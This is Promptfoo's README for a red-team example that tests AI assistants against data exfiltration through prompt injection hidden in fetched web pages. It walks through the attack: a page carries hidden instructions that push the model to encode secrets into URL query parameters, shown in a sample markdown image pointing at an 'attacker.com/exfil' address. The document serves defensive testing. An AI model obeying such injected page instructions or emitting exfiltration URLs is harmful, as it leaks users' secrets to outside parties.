Back to Promptfoo

redteam-indirect-web-pwn (Red Team Data Exfiltration via Indirect Web Prompt Injection)

examples/redteam-indirect-web-pwn/README.md

0.121.91.5 KB
Original Source

redteam-indirect-web-pwn (Red Team Data Exfiltration via Indirect Web Prompt Injection)

You can run this example with:

bash
npx promptfoo@latest init --example redteam-indirect-web-pwn
cd redteam-indirect-web-pwn

Introduction

This example demonstrates how to test an AI assistant for data exfiltration vulnerabilities using promptfoo's indirect-web-pwn strategy.

The attack works by:

  1. Creating a web page with hidden prompt injection instructions
  2. Asking the AI assistant to fetch and summarize the page
  3. The injected instructions attempt to trick the model into encoding sensitive data into URL query parameters (e.g., markdown images like ![img](http://attacker.com/exfil?api=SECRET))

The custom provider (provider.js) simulates a realistic AI assistant with a web_fetch tool that actually fetches URLs, making it a valid target for this attack.

Setup

  1. Install dependencies:
bash
npm install
  1. Set your OpenAI API key:
bash
export OPENAI_API_KEY=your-api-key-here

Running

Run the full red team scan (generates test cases and evaluates) in one command:

bash
npx promptfoo@latest redteam run

View results:

bash
npx promptfoo@latest view

What to Look For

  • FAIL results indicate the model attempted to exfiltrate data by embedding values in URL query parameters or markdown images
  • PASS results indicate the model refused the injection or did not attempt exfiltration